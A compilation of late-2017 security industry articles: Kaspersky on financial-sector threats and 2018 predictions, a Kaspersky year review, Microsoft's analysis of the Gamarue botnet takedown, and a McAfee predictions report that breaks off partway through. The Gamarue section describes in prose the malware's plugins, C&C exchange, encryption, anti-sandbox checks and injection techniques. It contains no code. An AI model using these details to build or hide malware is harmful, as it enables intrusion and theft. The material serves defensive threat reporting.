To complete their cybercriminal activities, attackers rely on proven schemes of monetizing network access. In addition to their attacks on SWIFT systems, cybercriminals have been actively using ATM infections, including those on financial institution’s own networks, as well as wielding RB (remote banking) systems, PoS terminal networks, and making changes in banks’ databases to ‘play’ with card balances.

Attacks on ATMs are worth mentioning separately. This kind of robbery became so popular that 2017 saw the first ATM malware-as-a-service: with cybercriminals providing on underground forums all necessary malicious programs and video instructions to gain access to ATMs. Those who bought a subscription only needed to choose an ATM, open it following the instructions, and pay the service organizers for activating the malicious program on the ATM, after which the money withdrawal process started. Schemes like this significantly increased the number of cybercriminals, even making cybercrime accessible to non-professionals.

We saw the interception of bank customers’ electronic operations through the hijacking of bank domains. Thus, customers did not have access to their bank’s real infrastructure, but to a fake one created by intruders. For several hours, criminals were therefore able to perform phishing attacks, install malicious code and wield the operations of customers who were using online banking services at the time.

It’s worth noting that, in some countries, banks have forgotten about the most “unimportant” thing – physical security. This has made attacks on banks’ financial assets possible. In some cases, this was due to easy access to cable lines, to which small Raspberry Pi devices were then connected. For several months these devices passively collected information about bank networks and sent intercepted data over LTE connections to the servers of intruders.

Predictions for 2018

  • Attacks via the underlying blockchain technologies of financial systems

Almost all of the world’s large financial organizations are actively investing in systems based on blockchain technology. Any new technology has its advantages, but also a number of new risks. Financial systems based on blockchain do not exist autonomously, therefore vulnerabilities and errors in blockchain implementation can enable attackers to earn money and disrupt the work of a financial institution. For instance, in 2016-2017, a number of vulnerabilities and errors were discovered in smart contracts, on which a number of financial institution’s services have been built.

  • More supply chain attacks in the financial sphere

Large financial organizations invest considerable resources in cybersecurity, thus the penetration of their infrastructure is not an easy task. However, a threat vector that is likely to be actively used by cybercriminals in the coming year is attacks on software vendors supplying financial organizations. Such vendors, for the most part, have a weak level of protection compared to the financial organizations themselves. Last year, we witnessed a number of attacks like this: including against  NetSarang, CCleaner, and MeDoc. As we can see, attackers replaced or modified updates for very different types of software. In the next year, we can expect cybercriminals to perform attacks via software designed specifically for financial organizations, including software for ATMs and PoS terminals. A few months ago we registered the first attempts of this kind, when attackers embedded a malicious module into a firmware installation file, and placed it on the official website of one of the American ATM software vendors.

  • Mass media (in general, including Twitter accounts, Facebook pages, Telegram, etc.) hacks and manipulation for getting financial profit through stock/crypto exchange trade

2017 will be remembered as the year of ‘fake news’. Besides the manipulation of public opinion, this phrase can also mean a dishonest way of earning money. While stock exchange trading is mostly carried out by robots manipulating source data, which is used to make certain transactions, it can also lead to enormous changes in the price of goods, financial instruments and cryptocurrencies. In fact, just one tweet from an influencer, or a wave of messages on a social network created with the help of fake accounts, can drive the markets. And this method will certainly be used by intruders. With this approach, it’s almost impossible to find out which of the beneficiaries is the customer of the attack.

  • ATM malware automation

The first malware for ATMs appeared in 2009, and since then these devices have received constant attention from cyber-fraudsters. There has been a continuous evolution of this type of attack. The past year saw the emergence of ATM malware-as-a-service, and the next step will be the full automation of such attacks – a mini-computer will be connected automatically to an ATM, leading to malware installation and jackpotting or card data collection. This will significantly shorten the time needed for intruders to commit their crime.

  • More attacks on crypto exchange platforms

For the past year, cryptocurrencies have attracted a huge number of investors, which in turn has led to a boom in new services for trading various coins and tokens. Traditional players in the financial market, with highly developed cybersecurity protection, haven’t rushed to enter this field.

This situation provides attackers with an ideal opportunity to target cryptocurrency exchanges. On the one hand, new companies haven’t managed to test their security systems properly. On the other hand, the entire cryptocurrency exchange business, technically speaking, is built on well-known principles and technologies. Thus, attackers know, as well as have, the necessary toolkit to penetrate the infrastructure of new sites and services working with cryptocurrencies.

  • Traditional card fraud will spike due to the huge data breaches of the previous year

Big personal data leaks – including the recent Equifax case, which resulted in more than 140 million U.S. residents’ data being leaked to cybercriminals, and the Uber case, when the data of another 57 million customers was leaked – has created a situation where traditional banking security can seriously fail, because it’s based on the analysis of data about current or potential customers.

For example, detailed knowledge of a victim’s personal data can allow attackers to pose as a banking customer, and extract their victim’s money or security information, while to the bank concerned, their request looks legitimate. Therefore, the coming year may be marked by a spike in quite traditional fraud schemes, with the big data that has been collected (but not properly protected) by organizations about their customers for years, set to help attackers in the successful realization of their fraud schemes.

  • More nation-state sponsored attacks against financial organizations

The infamous Lazarus group, which is likely to be North-Korean state-sponsored, has attacked a number of banks in different parts of the world in the last few years. These have included banks in countries in Latin America, Europe, Asia and Oceania. Their main purpose has been to withdraw large sums of money, amounting to hundreds of millions of dollars. In addition, the data released by the Shadow Brokers indicates that experienced state-sponsored APT-groups are targeting financial institutions in order to learn more about cash flows. It is very likely that, next year other APT groups from countries that have just joined the cyber-spy game will follow this approach – both to earn money and to obtain information about customers, the flow of funds and the internal procedures of financial organizations.

  • Fintechs’ inclusion and mobile only-users: a fall in the number of traditional PC-oriented internet-banking Trojans. Novice mobile banking users will be a new prime target for criminals

Digital banks will continue revolutionizing the financial sector on a global scale, especially in emerging markets. For example, in Brazil and Mexico, these banks are gaining more and more momentum and this, of course, has attracted cybercriminal attention. We are sure that the world of cybercrime will see increasing attacks against this type of banks and their customers. Their main feature is the complete absence of branches and traditional customer service. All communication between the bank and its customers actually occur through a mobile application. This can have several consequences.

The first is a decrease in the number of Windows Trojans, aimed at stealing money through traditional internet banking. The second is that the growing number of digital financial institutions will lead to organic growth in the number of users that are easy targets for cybercriminals: people without any mobile banking experience, but with banking applications installed on their mobile devices. These people will be the main targets for both malware attacks, such as Svpeng, and schemes completely built on social engineering. Persuading a customer to transfer money through a mobile application is much easier than forcing them to go to a physical bank and make a transaction.

Conclusion

During the past few years, the number and quality of attacks aimed at financial sector organizations has grown continuously. These are attacks on the infrastructure of an organization and its employees, not its customers.

The financial institutions that have not already thought about cybersecurity will soon face the consequences of hacker attacks. And these consequences will be incompatible with the continuation of these businesses: they will lead to a complete halt in operations as well as extreme losses.

To prevent situations like this from happening, it is necessary to constantly adapt security systems to new emerging threats. This is impossible without analyzing data and information about the most important and relevant cyberattacks aimed at financial organizations.

An effective approach to combating attacks will be for banks to choose the right security solutions, but also to use specialized intelligence reports on attacks as these contain information that must be implemented immediately into overall protection systems. For example, using YARA-rules and IOCs (indicators of compromise), will become vital for financial organizations in the coming months.

Kaspersky Security Bulletin: Review of the Year 2017

Introduction

The end of the year is a good time to take stock of the main cyberthreat incidents that took place over the preceding 12 months or so. To reflect on the impact these events had on organizations and individuals, and consider what they could mean for the overall evolution of the threat landscape.

Looking back over 2017, what stands out most is the growing number of blurred boundaries: between different types of threat and different types of threat actor.  Examples of this trend include the headline-making ExPetr attack in June. At first sight, this seemed to be yet another ransomware program, but it turned out to be a targeted, destructive data wiper. Another example is the dumping of code by the Shadow Brokers group, which placed advanced exploits allegedly developed by the NSA at the disposal of criminal groups that would otherwise not have had access to such sophisticated code. Yet another is the emergence of advanced targeted threat (APT) campaigns focused not on cyberespionage, but on theft,  stealing money to finance other activities the APT group is involved in. It will be interesting to see how this trend evolves over 2018.

Highlights of 2017

  • The defining cyber-moments of 2017 were, without doubt, the WannaCry, ExPetr and BadRabbit ransomware attacks. The infamous Lazarus threat actor is believed to have been behind WannaCry, which spread at staggering speed and is now believed to have claimed around 700,000 victims worldwide. ExPetr was more targeted, hitting businesses including many well-known global brands through infected business software.  Maersk, the world’s largest container ship and supply vessel company has declared anticipated losses of between $200 mln. and $300 mln. as a result of ‘significant business interruption’ caused by the attack; while FedEx/TNT has announced around $300 mln. in lost earnings.
  • Elsewhere, the world’s big cyberespionage threat actors continued to do what they do, but with new, harder-to-detect tools and approaches. We reported on a wide range of campaigns, including the historically significant Moonlight Maze, believed to be related to Turla, as well as another Turla-related APT we call WhiteBear. We also uncovered the most recent toolkit of the Lamberts, an advanced threat actor that can be compared with Duqu, Equation, Regin or ProjectSauron in terms of complexity, and more technical details about the Spring Dragon group. In October, our advanced exploit prevention systems identified a new Adobe Flash zero-day exploit used in the wild against our customers, delivered through a Microsoft Office document.  We can confidently link this attack to an actor we track as BlackOasis.  For a more detailed summary of APT activity during 2017, you can view our annual APT review webinar here.
  • In 2017 we also observed a resurgence of targeted attacks designed to destroy data, either instead of, or as well as data theft, for example Shamoon 2.0 and StoneDrill. We also uncovered threat actors achieving success, sometimes for years, with simple and poorly executed campaigns. The EyePyramid attack in Italy was a good example of this. Microcin provided another instance of how cybercriminals can achieve their goals by using cheap tools and selecting their targets with care.
  • 2017 also revealed the extent to which advanced threat actors were diversifying into common theft to fund their expensive operations. We reported on BlueNoroff a subset of the infamous Lazarus group and responsible for the generation of illegal profits. BlueNoroff targeted financial institutions, casinos, companies developing financial trade software and those in the crypto-currency business, among others. One of the most notable BlueNoroff campaigns was its attacks on financial institutions in Poland.
  • Attacks on ATMs continued to rise in 2017, with attackers targeting bank infrastructure and payment systems using sophisticated fileless malware, as well as by the more rudimentary methods of taping over CCTVs and drilling holes. More recently, we discovered a new targeted attack on financial institutions – mainly banks in Russia, but also some in Malaysia and Armenia. The attackers behind this Silence Trojan used a similar approach to Carbanak.
  • Supply chain attacks appear to be the new ‘watering holes’ when it comes to targeting business victims. An emerging threat in 2017, seen in ExPetr and ShadowPad, which looks set to increase further in 2018.
  • A year on from the Mirai botnet in 2016, the Hajime botnet was able to compromise 300,000 connected devices – and it was just one of many campaigns focused on connected devices and systems.
  • 2017 also saw a number of massive data breaches, with millions of records exposed overall –  these include Avanti Markets, Election Systems & Software, Dow Jones, America’s Job Link Alliance and Equifax. The Uber data breach which took place in October 2016 and exposed the data of 57 million customers and drivers was only made public in November 2017.
  • The mobile malware landscape also evolved in 2017, and Trojanized mobile apps were downloaded in their tens of thousands or more, resulting in victims being swamped with aggressive advertising, hit with ransomware or facing theft through SMS and WAP billing. Mobile malware added new tricks to avoid detection, bypass security and exploit new services. As in 2016, many such apps were readily available through reputable sources such as the Google Play Store. Trojans particularly prevalent in 2017 included the Ztorg Trojan, Svpeng, Dvmap, Asacub and Faketoken.

Conclusion

2017 was a year when many things turned out to be very different from what they initially seemed to be. Ransomware was a wiper; legitimate business software was a weapon; advanced threat actors made use of simple tools while attackers farther down the food chain got their hands on highly sophisticated ones. These shifting sands of the cyberthreat landscape represent a growing challenge for security defenders.

For more information on these trends and advice on staying safe, please see the full Review of the Year 2017.

 Download the Kaspersky Security Bulletin: Review of the Year 2017

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue’s sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet’s command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet’s servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue’s global prevalence.

Figure 1. Gamarue’s global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc
  • Rootkit (included in crime kit) – Injects rootkit codes into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer) ​
  • Teamviewer ($250) – Enables attacker to remotely control the victim machine, spy on the desktop, perform file transfer, among other functions
  • Spreader – Adds capability to spread Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses Domain Name Generation (DGA) for the servers where it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue’s attack kill-chain

Gamarue’s main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disk’s volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication whether the signed in user has administrative rights, and keyboard language setting for the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazahkstan

Before sending to the C&C server, this information is encrypted with RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with RC4 algorithm using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes – time to wait for when to ask the C2 server for the next command
  • Task ID - used by the hacker to track if there was an error performing the task
  • Command – one of the command mentioned above
  • Download URL - from which a plugin/updated binary/other malware can be downloaded depending on the command.

Figure 9. Decrypted reply from C&C server

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list hashes of the processes running on a potential victim’s machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a fake payload is manifested when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn using Gamarue. Since Gamarue’s main purpose is to distribute other malware, hackers earn using pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developers.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

 

 

Microsoft Digital Crimes Unit and Windows Defender Research team

 

 

Get more info on the Gamarue (Andromeda) takedown from the following sources:

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community.

Follow us on Twitter @WDSecurity and Facebook Microsoft Malware Protection Center

‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends

This report was written by members of McAfee Labs and the Office of the CTO.

Welcome to the McAfee Labs 2018 Threats Predictions Report. We find ourselves in a highly volatile stage of cybersecurity, with new devices, new risks, and new threats appearing every day. In this edition, we have polled thought leaders from McAfee Labs and the Office of the CTO. They offer their views on a wide range of threats, including machine learning, ransomware, serverless apps, and privacy issues.

The Adversarial Machine Learning Arms Race Revs Up
The rapid growth and damaging effects of new cyberthreats demand defenses that can detect new threats at machine speeds, increasing the emphasis on machine learning as a valuable security component. Unfortunately, machines will work for anyone, fueling an arms race in machine-supported actions from defenders and attackers. Human-machine teaming has tremendous potential to swing the advantage back to the defenders, and our job during the next few years is to make that happen. To do that, we will have to protect machine detection and correction models from disruption, while continuing to advance our defensive capabilities faster than our adversaries can ramp up their attacks.

Ransomware Pivots to New Targets, New Objectives
The profitability of traditional ransomware campaigns will decline as vendor defenses, user education, and industry strategies improve to counter them. Attackers will target less traditional, more profitable ransomware targets, including high net-worth individuals, connected devices, and businesses. This pivot from the traditional will see ransomware technologies applied beyond the objective of extorting individuals, to cyber sabotage and disruption of organizations. The drive among adversaries for greater damage, disruption, and the threat of greater financial impact will not only spawn new variations of cybercrime “business models,” but also begin to seriously drive the expansion of the cyber insurance market.

Serverless Apps: New Opportunities for Friend and Foe
Serverless apps can save time and reduce costs, but they can also increase the attack surface by introducing privilege escalation, application dependencies, and the vulnerable transfer of data across networks. Serverless apps enable greater granularity, such as faster billing for services. But they are vulnerable to attacks exploiting privilege escalation and application dependencies. They are also vulnerable to attacks on data in transit across a network. Function development and deployment processes must include the necessary security processes, and traffic that is appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront
As connected devices fill your house, companies will have powerful incentives to observe what you are doing in your home, and probably learn more than you want to share. In 2018, McAfee predicts more examples of corporations exploring new ways to capture that data. They will consider the fines of getting caught to be the cost of doing business, and change the terms and conditions on your product or service to cover their lapses and liabilities. It is more difficult to protect yourself from these issues, and the next year will see a significant increase in breaches and discoveries of corporate malfeasance.

Inside Your Child’s Digital Backpack
Perhaps the most vulnerable in this changing world are our children. Although they face an amazing future of gadgets, services, and experiences, they also face tremendous risks to their privacy. We need to teach them how to pack their digital backpacks so that they can make the most of this future. The world is becoming very public, and though many of us seem to be OK with that, the consequences of an ill-considered post or thoughtless online activity can be life altering for years to come.

The Adversarial Machine Learning Arms Race Revs Up

Attackers and defenders work to out-innovate each other in AI

Human-machine teaming is becoming an essential part of cybersecurity, augmenting human judgment and decision making with machine speed and pattern recognition. Machine learning is already making significant contributions to security, helping to detect and correct vulnerabilities, identify suspicious behavior, and contain zero-day attacks.

During the next year, we predict an arms race. Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and artificial intelligence (AI), and expand their efforts to discover and disrupt the machine learning models used by defenders. At some point during the year, we expect that researchers will reverse engineer an attack and show that it was driven by some form of machine learning. We already see black-box attacks that search for vulnerabilities and do not follow any previous model, making them difficult to detect. Attackers will increase their use of these tools, combining them in novel ways with each other and with their attack methods. Machine learning could help improve their social engineering—making phishing attacks more difficult to recognize—by harvesting and synthesizing more data than a human can. Or increase the effectiveness of using weak or stolen credentials on the growing number of connected devices. Or help attackers scan for vulnerabilities, boosting the speed of attacks and shortening the time from discovery to exploitation.

Whenever defenders come out with something new, the attackers try to learn as much about it as possible. Adversaries have been doing this for years with malware signatures and reputation systems, for example, and we expect them to do the same with the machine learning models. This will be a combination of probing from the outside to map the model, reading published research and public domain material, or trying to exploit an insider. The goal is evasion or poisoning. Once attackers think they have a reasonable recreation of a model, they will work to get past it, or to damage the model so that either their malware gets through or nothing gets through and the model is worthless.

On the defenders’ side, we will also combine machine learning, AI, and game theory to probe for vulnerabilities in both our software and the systems we protect, to plug holes before criminals can exploit them. Think of this as the next step beyond penetration testing, using the vast capacity and unique insights of machines to seek bugs and other exploitable weaknesses.

Because adversaries will attack the models, defenders will respond with layers of models—operating independently—at the endpoint, in the cloud, and in the data center. Each model has access to different inputs and is trained on different data sets, providing overlapping protections. Speaking of data, one of the biggest challenges in creating machine learning models is gathering data that is relevant and representative of the rapidly changing malware environment. We expect to see more progress in this area in the coming year, as researchers gain more experience with data sets and learn the effects of old or bad data, resulting in improved training methods and sensitivity testing.

The machines are rising. They will work with whoever feeds them data, connectivity, and electricity. Our job is to advance their capabilities faster than the attackers, and to protect our models from discovery and disruption. Working together, human-machine teaming shows great potential to swing the advantage back to the defenders.

Ransomware Pivots to New Targets, New Objectives

Swings from the traditional to new targets, technologies, tactics, and business models

McAfee sees an evolution in the nature and application of ransomware, one that we expect to continue through 2018 and beyond.

The good news about traditional ransomware. McAfee Labs saw total ransomware grow 56% over the past four quarters, but evidence from McAfee Advanced Threat Research indicates that the number of ransomware payments has declined over the last year.

Our researchers assert that the trend suggests a greater degree of success during the last 12 months by improved system backup efforts, free decryption tools, greater user and organizational awareness, and the collaborative actions of industry alliances such as NoMoreRansom.org and the Cyber Threat Alliance.

How cybercriminals are adjusting. These successes are forcing attackers to pivot to high-value ransomware targets, such as victims with the capacity to pay greater sums, and new devices lacking comparable vendor, industry, and educational action.

Targeting higher net-worth victims will continue the trend toward attacks that are more personal, using more sophisticated exploitation of social engineering techniques that deliver ransomware via spear phishing messages. These high-value targets will be attacked at their high-value endpoints, such as their increasingly expensive personal devices, including the latest generation of smart phones. Cloud backups on these devices have made them relatively free from traditional ransomware attacks. McAfee predicts that attackers will instead try to “brick” the phones, making them unusable unless a ransom payment is sent to restore them.

McAfee believes this pivot from the traditional is reflected in the slight decline in the number of overall ransomware families, as criminals shift to a smaller number of higher-value technologies and tactics, more talented purveyors of techniques, and more specialized, more capable ransomware-as-a-service providers.

New ransomware families discovered in 2017. On average, 20%‒30% per month of new samples are based on Hidden Tear ransomware code. Source: McAfee Labs.

The less sophisticated, mostly well-known, mostly predictable, one-to-many technology, tactics, and providers are simply failing to deliver the rewards to justify the investments, even modest ones.

If well-understood ransomware families survive and thrive, McAfee believes they will do so in the hands of trusted service providers that continue to establish themselves with more established, sophisticated backends, as is currently the case with the Locky family.

Where the digital impacts the physical. Every year, we read predictions about threats to our physical safety from security breaches of industrial systems in transportation, water, and power. We are also perennially entertained with creative depictions of physical threats brought about by the imminent hacking rampage of consumer devices, from the car to the coffeemaker.

McAfee resists the temptation to join the cybersecurity-vendor chorus line to warn you of the danger that lurks within your vacuum cleaner. But our researchers do foresee digital attacks impacting the physical world. Cybercriminals have an incentive to place ransomware on connected devices providing a high-value service or function to high-value individuals and organizations.

Rather than seize control of your grandmother’s automobile brakes as she drives along a winding mountain road, our researchers believe it more likely and more profitable for cybercriminals to apply ransomware to an important business executive’s car, preventing them from driving to work. We believe it more likely and more profitable for cybercriminals to place ransomware on a wealthy family’s thermostat in the dead of winter, than to set the homes of millions ablaze through their coffeemakers.

In these and other ways, we believe cybercriminals will see greater return in orchestrating digital attacks that physically impact individuals for profit, rather than fatal damage.

Beyond extortion to disruption and destruction. The WannaCry and NotPetya ransomware outbreaks foreshadow a trend of ransomware being applied in new ways, in pursuit of new objectives, becoming less about traditional ransomware extortion and more about outright system sabotage, disruption, and damage.

The WannaCry and NotPetya campaigns quickly infected large numbers of systems with ransomware, but without the payment or decryption capabilities necessary to unlock impacted systems. Although the exact objectives are still unclear, McAfee believes the attackers could have sought to blatantly disrupt or destroy huge networks of computers, or disrupt and distract IT security teams from identifying other attacks, in much the same way DDoS attacks have been used to obscure other real aspects of attacks. It is also possible that they represented spectacular proofs of concept, demonstrating their disruptive and destructive power, intending to engage large organizations with mega-extortion demands in the future.

In 2018, McAfee expects to see ransomware used in the manner of WannaCry and NotPetya. Ransomware-as-a-service providers will make such attacks available to countries, corporations, and other nonstate actors seeking to paralyze national, political, and business rivals in much the same way that NotPetya attackers knocked global IT systems out of commission at corporations around the world. We expect an increase in attacks intended to cause damage, whether by unscrupulous competitors or by criminals trying to mimic a mafia-style protection racket in cyber form.

Although this weaponization of ransomware at first seems to stretch the definition of the technology and tactical concept, consider the incentive of avoiding a WannaCry or NotPetya specific to your organization, complete with rapid, wormlike propagation and a demonstration of material disruption and damage, but with a demand for payment to make it all stop.

Of course, this raises the biggest, unavoidable ransomware question of 2017: Were WannaCry and NotPetya actually ransomware campaigns that failed in their objectives to make significant revenue? Or perhaps incredibly successful wiper campaigns?

Finally, McAfee predicts that these shifts in the nature and objectives of ransomware attacks, and their potential for real material financial impacts, will create an opportunity for insurance companies to extend their digital offerings with a range of ransomware insurance.

Serverless Apps: New Opportunities for Friend and Foe

This section was updated on December 11th.

Serverless apps attempt to match the security of a container or virtual machine

“Serverless” apps, the latest aspect of virtual computing, enable a new degree of abstraction in application development, by leveraging Functions as a Service (FaaS) for their computation requirements. Functions are billed only while they are executing, including sub-second billing (AWS Lambda charges per 100ms). Paying only for executing business logic, as opposed to running a full container or a virtual machine, can reduce costs by a factor of 10 for some operations. But what about the security of these function calls? They are vulnerable in traditional ways, such as privilege escalation and application dependencies, but also in new ways, such as traffic in transit and an increased attack surface.

Let’s start with the traditional vulnerabilities. Serverless apps that are quickly implemented or rapidly deployed can use an inappropriate privilege level, leaving the environment open to a privilege escalation attack. Achieving least privilege is more difficult with more components to protect, contain, and update. Similarly, the speed of deployment can result in a function depending on packages pulled from external repositories that are not under the organization’s control and have not been properly evaluated.

Then there are the new risks. Because serverless apps naturally scale and bill based on traffic, distributed denial of service attacks can more easily translate directly to the bottom line, depending on the number of simultaneous executions allowed by the application.

Another risk is data that may be leveraged by multiple functions to process a business transaction. Because a serverless application may include more components than prior application architectures, the data may be at more risk of interception or manipulation. Comprehensive and ubiquitous use of authentication and authorization between services and encryption of data both at rest and in transit should be leveraged.

We predict the increased granularity of serverless apps will lead to a comparable increase in the attack surface. More functions, transiting to one or more providers, means more area for an attacker to exploit or disrupt. Make sure your function development and deployment process includes the necessary security steps, and that traffic is appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront

Without controls, you might surrender your privacy to corporate marketers

Corporate marketers have powerful incentives to observe and understand the buying needs and preferences of connected home device owners. Networked devices already transmit a significant amount of information without the knowledge of the overwhelming majority of consumers. Customers rarely read privacy agreements, and, knowing this, corporations are likely to be tempted to frequently change them after the devices and services are deployed to capture more information and monetize it.

In 2018, connected home device manufacturers and service providers will seek to overcome thin operating margins by gathering more of our personal data—with or without our agreement—as we practically surrender the home to become a corporate virtual store front.

With such dynamics in play, and with the technical capabilities already available to device makers, corporations could offer discounts on devices and services in return for the ability to monitor consumer behavior at the most personal level.

Rooms, devices, and apps are easily equipped with sensors and controls capable enough to inform corporate partners of the condition of home appliances, and bombard consumers with special upgrade and replacement offers.

It is already possible for children’s toys to monitor their behavior and suggest new toys and games for them, including upgrades for brand-name content subscriptions and online educational programs.

It is already possible for car manufacturers and their service centers to know the location of specific cars, and coordinate with owners calendars and personal assistants to manage and assist in the planning of their commutes. Coffee, food, and shopping stops could automatically be integrated into their schedules, based on their preferences and special offers from favorite food and beverage brands.

Whether this strikes you as a utopia for consumers and marketers, or a dystopian nightmare for privacy advocates, many aspects of these scenarios are close to reality.

Data collection from the current wide range of consumer devices and services is running far ahead of what most people believe.

Although there is certainly a legal argument that consumers have agreed to the collection of their data, even those of us technically knowledgeable to know this is taking place do not read the contracts that we agree to, and some corporations might change them after the fact or go beyond what they promise.

